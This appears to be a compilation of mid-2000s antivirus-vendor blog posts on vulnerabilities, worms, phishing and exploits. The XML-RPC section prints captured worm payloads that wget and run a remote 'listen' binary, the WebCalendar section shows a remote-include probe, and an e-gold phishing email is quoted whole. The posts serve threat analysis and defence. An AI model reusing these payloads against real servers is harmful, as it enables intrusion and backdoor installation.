Sans has just released its new TOP 20
Internet Security Vulnerabilities.


Below are the list:

Top Vulnerabilities in Windows Systems

• 1. Windows Services
• 2. Internet Explorer
• 3. Windows Libraries
• 4. Microsoft Office and Outlook Express
• 5. Windows Configuration Weaknesses

Top Vulnerabilities in Cross-Platform Applications

• 1. Backup Software
• 2. Anti-virus Software
• 3. PHP-based Applications
• 4. Database Software
• 5. File Sharing Applications
• 6. DNS Software
• 7. Media Players
• 8. Instant Messaging Applications
• 9. Mozilla and Firefox Browsers
• 10. Other Cross-platform Applications

Top Vulnerabilities in UNIX Systems

• 1. UNIX Configuration Weaknesses
• 2. Mac OS X

Top Vulnerabilities in Networking Products

• 1. Cisco IOS and non-IOS Products
• 2. Juniper, CheckPoint and Symantec Products
• 3. Cisco Devices Configuration Weaknesses

Read more about the vulnerabilities at the SANS site.

A few days ago we had an advisory on an XML-RPC malware attacking our smallpot Nodes. The first one we detect as HKTL_CALLBACK.A, and the other as HKTL_CALLBACK.B. The HKTL_CALLBACK.B is being re-verified since there are reports that it is a worm, and not a “hack tool”.

Anyway, right now we are again receiving a round of attacks same as that of the previous XML-RPC ones.
We are currently acquiring the sample (i say ‘currently acquiring’ since some of the sources are dead) and we will post updates later (of course!).

For added reading, check out this link (which pretty much says it all):
ISC

HKTL_CALLBACK.B will now be detected as ELF_LUPPER.A

Now we are (again) seeing pretty much the same thing as ISC:

• exploits awstats.pl vulnerability
  
• exploits xmlrpc.php

From ISC:
“You can find the details of the vulnerability at:
http://www.gulftech.org/?node=research&article_id=00088-07022005
http://www.securityfocus.com/bid/14088/
http://secunia.com/advisories/15852/

For a list of vulnerable applications, please refer to:
http://www.securityfocus.com/bid/14088/info
http://www.osvdb.org/17793

If you are running a vulnerable version, you are advised to upgrade mmediately:
http://www.securityfocus.com/bid/14088/solution”

However, for the xmlrpc.php, instead of downloading the file ‘cback’ or ‘lupii’, it now downloads a file named ‘listen’. Based on initial analysis, it seems to have both the functionalities of ‘cback’ and ‘lupii’:

• it can be run with an argument, which IMO, acts as a connect-back program for the attacker (same as cback – HKTL_CALLBACK.A)
  
• it also has worm capabilities to propagate via awstats.pl or xml-rpc exploits (same as lupii – ELF_LUPPER.A)

Possible ELF_LUPPER.B?

So far we’ve seen the following attacks:

POST requests to the following URL’s:

• /xmlrpc/xmlrpc.php
  
• /wordpress/xmlrpc.php
  
• /phpgroupware/xmlrpc.php
  
• /drupal/xmlrpc.php
  
• /blogs/xmlsrv/xmlrpc.php
  
• /blog/xmlsrv/xmlrpc.php
  
• /blog/xmlrpc.php

This, of course attempts to exploits the XML-RPC vulnerability.

It also sends a GET request to exploit the awstats.pl configdir vulnerability and targets the following URL’s:

• /cgi-bin/
  
• /cgi-bin/awstats/
  
• /awstats/

The malware appends the exploit code at the end of these directories. Sample captures of the 2 attacks are as follows:

XML-RPC
==============================
POST /xmlrpc.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
Content-Type: text/xml
Content-Length:269


test.method
‘,”));
echo ‘_begin_’;echo `cd /tmp;wget 24.xxx.xxx.18/listen;chmod +x listen;./listen `;
echo ‘_end_’;exit;/*
==============================


AWSTATS.PL
==============================
GET /awstats/awstats.pl?configdir=|echo;
echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3b
chmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;
echo| HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
==============================

The PoC for Microsoft Windows Plug and Play “Umpnpmgr.dll” Remote Exploit MS05-047. Has just been released by FRSIRT.

With this release, we are now on the look out. I predict it will just be a matter of days (or hours) for a new malware to carry this exploit.

After more review of the PoC given by frsirt, we verified that it can only crash the machines targeted, since there is no actual shellcode that can be seen in the PoC.

So malware within hours might have been an overstatement in my part. Hehe… But hey when great minds work there”s no impossible right? :)

Some factors on why a working exploit (not just a DOS) for this requires some time (although it has already been around 2 weeks hehehe):

1. This exploit works by sending a long string using a specified registry key and appending lots of “”. Ex: “ACPI\….” (under HKLMSYSTEMCurrentControlSetEnum)
.
2. Specifying characters other than “” and characters that are not in the subkeys of HKLMSYSTEMCurrentControlSetEnum will not trigger the exploit
3. When we finally have control of the stack, it points to a “00 xx 00 yy) address.

Quote from Dave Aitel on this bug:
“The umpnp bug is a bit more complex, you can overwrite eip with 00XX00YY where XX and YY are characters from a registry key you get to pick. It’s fun for the whole family. Do you A) spam the heap with lots of your shellcode? or B) off by two EIP and hope for something cool? C) find an 0day

This has already been forwarded to the NVW team and was said to be already detected with NVW pattern NVP10229.

Also some workaround for this vulnerability is included in this report made.

Just when Microsoft published MS05-047 vulnerability which is dubbed as ‘Vulnerability in Plug and Play Could Allow Remote Code Execution and Local Elevation of Privilege’ a couple of days after, a remote exploit was publicly posted on FrSIRT.

And just as we expected, a malware that utilizes this exploit follows!

The malware behaves as a backdoor. It installs itself as a service with the name ‘Windows UDP Communication’. To be able to notify the author of the malware, it connects the infected system to particular IRC server/s then only that the attacker can gain control of the affected system. In effect, it registers the affected system as member of a botnet.

Just as other bots, this malware can perform Distributed Denial of Service (DDOS) such as SYN and UDP flood attacks. And the reason why I posted this malware is that it carries an exploit on its body as part of its malicious activites. It exploits the newly published vulnerability abovementioned as one of the commands that the attacker can issue to the affected system remotely!

The malware has been given the detection name BKDR_MOCBOT.A. So, be sure that you have patched up your system to lessen the impact of this kind of malware!

The spammed email arrives with the following details.

From: E-gold {spoofed}
To: {recepient’s email address}
Subject: E-gold security connect
Attachments: Connect.zip (33 KB)
Body:
————————————————–
* * * Read/Save/Print this email message * * *
————————————————–

Dear e-gold payment system user,

The recent cases of fraud, unauthorized withdrawal of cash from our clients’ accounts and recurred attempts of hackers to access our server forced us to implement a new security system. The special program will ensure safe connection of your computer to our server by means of a unique encoded key, specially generated for each account. Only the combination of your login, password and the key will allow you to access the system. The program is enclosed to the message and doesn’t need any installation. By one click you will be connected to the server and the program will generate the key. After that you will enter your account from Internet Explorer, which is absolutely safe. You will be signed out of the program automatically after closing the window. See the detailed operational instruction enclosed to the program.

We have to warn you, that if you want to be the user of our system in future, you’ll have to accept our rules and to use this program. Otherwise please call the numbers below to withdraw your funds. For the detailed information please enter our site or use our hot line to contact us by phone.

Our Contacts:

Phone (Worldwide) +1 321-957-1200
FAX (Worldwide) +1 321-952-0790

———————————————
Thank you for using e-gold!
———————————————

Analysis
The attachment Connect.zip contains an executable file named connect.exe which we now detect as TSPY_GOLDUN.AN.

When the unsuspecting user executes the attachment, a dialog box will appear. But, that is not just it! As soon as the unsuspecting user sees the dialog box, the following behind-the-scene malicious activities of the attachment had taken place!

• Drops and executes a temporary file in the Windows Temporary folder named xcqwdhe.exe.
  
  
  
  • Drops the file “mside.dll” in the Windows System directory.
    
    
    
    • This is the actual component that checks the web site address, the user is currently browsing to and activates its keylogging capabilty when it matches the following web sites.
      
      
      
      • https://www.e-gold.com/acct/balance.asp
        
      • https://www.e-gold.com/acct/acct.asp
    
    
  • Adds the registry entry
    HKEY_CLASSES_ROOTCLSID{13146842-6251-5625-3072-548536364311} and other subkeys
    
  • Adds the registry entry
    HKEY_LOCAL_MACHINESOFTWAREClassesCLSID {13146842-6251-5625-3072-548536364311} and other subkeys
    
  • Adds the registry entry
    HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion ExplorerBrowser Helper Objects{13146842-6251-5625-3072-548536364311}
  
  
• Deletes the temporary file xcqwdhe.exe by creating and spawning a batch file that deletes itself as well in the end.
  
• Then, finally the long been waiting dialog box will appear as if nothing ‘malicious’ has happend!

This will happen just within a blink of an eye and an average user would think that it is still smooth sailing, eh.:(

The registry entries above and other subkeys just enables the “mside.dll” module to be attached to every instance of IE browser in effect, it installs a Browser Helper Object. Now, that’s where its malicious work gets started, every time you run your favorite browser!

The Connect and Continue buttons of the dialog box will connect you to
https://www.e-gold.com/acct/login.html and exits the dialog box, respectively. The url where you will be connected is legitimate but remember, it is in your browser that do tricks!

One workaround to avoid future incident like this is to change your browser since, BHO is only for IE! Another would be to keep your antivirus pattern files updated and the most handy workaround for this kind of incident is basic security awareness! Cheers!

We are currently verifying a PoC for an IE 0-day exploit.

Updates and details later. Just to let you know that we’re on it.

Apparently this bug has been around for quite some time now:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1790

And yes, the exploit does work. The PoC opens calc.exe on my Windows XP Sp2 (fully patched) machine. Attackers can easily modify the code and put in their own downloaders, instead of just calc.exe executing.

“As well documented, the vulnerability is instigated by IE’s failure to correctly initialise the JavaScript “Window()” function, when used in conjunction with a event.”
http://www.computerterrorism.com/research/ie/ct21-11-2005

As a workaround (again) disable JavaScript.

The Internet Storm Center (ISC) changed their InfoCon status to Yellow, to account for this currently unpatched IE vulnerability.

Additionally, Microsoft posted a new security advisory to address this issue. Check it out here.

http://www.microsoft.com/technet/security/advisory/911302.mspx

An exploit code for Macromedia Flash Player is now open to the public as FrSIRT posted it in their website. This is related to an earlier post “Macromedia Flash Vulnerability”. This exploit code works on Macromedia Flash Player version 7.0.189.0 and earlier.

It is noted that most malware authors uses modified proof-of-concept codes in their malicious programs. Thus it is highly recommended that users upgrade their Macromedia Flash players to version 8 to avoid malicious attacks which can be caused by exploiting the vulnerability found in the earlier versions of this player. Get Macromedia Flash Player upgrade here.

I couldn’t think of a catchy title, so
anyway…


We’ve received some packets in our smallpot nodes that utilize this
vulnerability, however, these packets only do a getting-to-know-you
thing instead of exploiting the machine.


What’s that again?


Like this: the packets look like this:

GET /webcalendar/tools/send_reminders.php?

includedir=http://xxx.xxx.xxx.xxx/~max4/…/t.txt? HTTP/1.1


The vulnerability is described as: (according to FrSirt – http://
www.frsirt.com /english/ advisories/2005/1513)

“A vulnerability was identified in WebCalendar, which may be
exploited by attackers to compromise a vulnerable web server. This
flaw is due to an input validation error in the
“send_reminders.php” script when processing a specially crafted
“includedir” parameter, which may be exploited by remote attackers
to include malicious files and execute arbitrary commands with the
privileges of the web server.”


So, the next step for me would be to get the target file, which
when accessed, shows the following:

&lthead>
&lttitle>Vulner4bl3



Accesing t.txt (which is NOT a text file, btw), alerts the attacker
on which targets are vulnerable(obviously).


Upgrading WebCalendar is the solution, and is available here

The source code for finding MD5 and MD4
collisions has been released. This could mean the start of fall for
the much used MD5 hash algorithm.


The source codes are found below.

• MD4
• MD5

Read more about this here.

After the XCP DRM and the exploitable uninstaller, another DRM was discovered which is said to be a spyware from SUNNCOMM. Sony, again, released an uninstaller for the said program. Unfortunately, there are reports that the second uninstaller has exploits in it.

Begin start quote

“It turns out that the web-based uninstaller SunnComm provides opens up a major security hole very similar to the one created by the web-based uninstaller for Sony”s other DRM, XCP, that we announced a few days ago.”

End quote

The report stated that the new security flaw is different with the first one reported.

Begin quote

“To be clear, the SunnComm security flaw does not apply to the software that ships on CDs, but only to the uninstaller that SunnComm distributes separately for removing the CD software. So if you haven”t used the uninstaller, you”re not vulnerable to this flaw and you don”t need to do anything.”

End quote

The CLSID for the second ActiveX is {1F1EB85B-0FE9-401D-BC53-10803CF880A7}. We can use the workaround suggested in the related blog “Sony’s uninstaller is prone to exploit!!!”.

Here’s the complete story about the spyware:
Sony Shipping Spyware from SunnComm, Too

and for the controversial uninstaller:
Not Again! Uninstaller for Other Sony DRM Also Opens Huge Security Hole

Whew! Sony sure have a hard time these past days. :)